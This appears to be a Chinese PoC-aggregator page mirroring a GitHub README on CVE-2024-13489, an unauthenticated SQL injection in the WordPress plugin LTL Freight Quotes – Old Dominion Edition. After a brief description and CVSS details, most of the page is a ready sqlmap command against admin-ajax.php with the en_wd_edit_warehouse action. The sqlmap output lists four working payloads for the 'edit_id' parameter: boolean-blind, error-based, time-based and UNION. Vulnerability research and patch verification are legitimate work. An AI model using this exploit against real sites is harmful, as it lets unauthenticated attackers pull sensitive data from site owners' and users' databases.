POC详情: a14eb27ade80dd8a6e4e3e14d867ae4f849c99b4

来源
https://github.com/RandomRobbieBF/CVE-2024-13489
关联漏洞
标题: LTL Freight Quotes – Old Dominion Edition <= 4.2.10 - 未认证的SQL注入漏洞 (CVE-2024-13489)
描述:适用于WordPress的LTL Freight Quotes – Old Dominion Edition插件在所有版本(包括)4.2.10中,存在SQL注入漏洞。该漏洞是由于对用户提供的参数'edit_id'和'dropship_edit_id'没有进行充分的转义处理,且对现有的SQL查询没有进行充分的准备所致。这使得未认证的攻击者能够将额外的SQL查询附加到已存在的查询中,从而可以用来从数据库中提取敏感信息。
描述
LTL Freight Quotes – Old Dominion Edition <= 4.2.10 - Unauthenticated SQL Injection
介绍
# CVE-2024-13489
LTL Freight Quotes – Old Dominion Edition <= 4.2.10 - Unauthenticated SQL Injection

# Description

The LTL Freight Quotes – Old Dominion Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

## Details

- **Type**: plugin
- **Slug**: ltl-freight-quotes-odfl-edition
- **Affected Version**: 4.2.10
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2024-13489
- **Status**: Active



POC
---

```
sqlmap.py -u 'http://kubernetes.docker.internal:8929/wp-admin/admin-ajax.php' --data='action=en_wd_edit_warehouse&edit_id=1&wp_nonce=13db5f2e7d' --level=2 --dbms='MySQL '

[*] starting @ 15:35:17 /2025-02-20/

[15:35:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: edit_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=en_wd_edit_warehouse&edit_id=1 AND 8084=8084&wp_nonce=13db5f2e7d

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: action=en_wd_edit_warehouse&edit_id=1 AND GTID_SUBSET(CONCAT(0x7170787171,(SELECT (ELT(3874=3874,1))),0x717a627171),3874)&wp_nonce=13db5f2e7d

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=en_wd_edit_warehouse&edit_id=1 AND (SELECT 8170 FROM (SELECT(SLEEP(5)))Gvfy)&wp_nonce=13db5f2e7d

    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: action=en_wd_edit_warehouse&edit_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787171,0x6e57584a4f524f56504572467179796c6a6c6c527872646a73464444414144707067736542565243,0x717a627171),NULL,NULL,NULL,NULL,NULL-- -&wp_nonce=13db5f2e7d
---
[15:35:18] [INFO] testing MySQL
[15:35:18] [INFO] confirming MySQL
[15:35:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP 8.2.21, Apache 2.4.59
back-end DBMS: MySQL >= 8.0.0

```
文件快照

 [4.0K]  /data/pocs/a14eb27ade80dd8a6e4e3e14d867ae4f849c99b4
└── [2.5K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。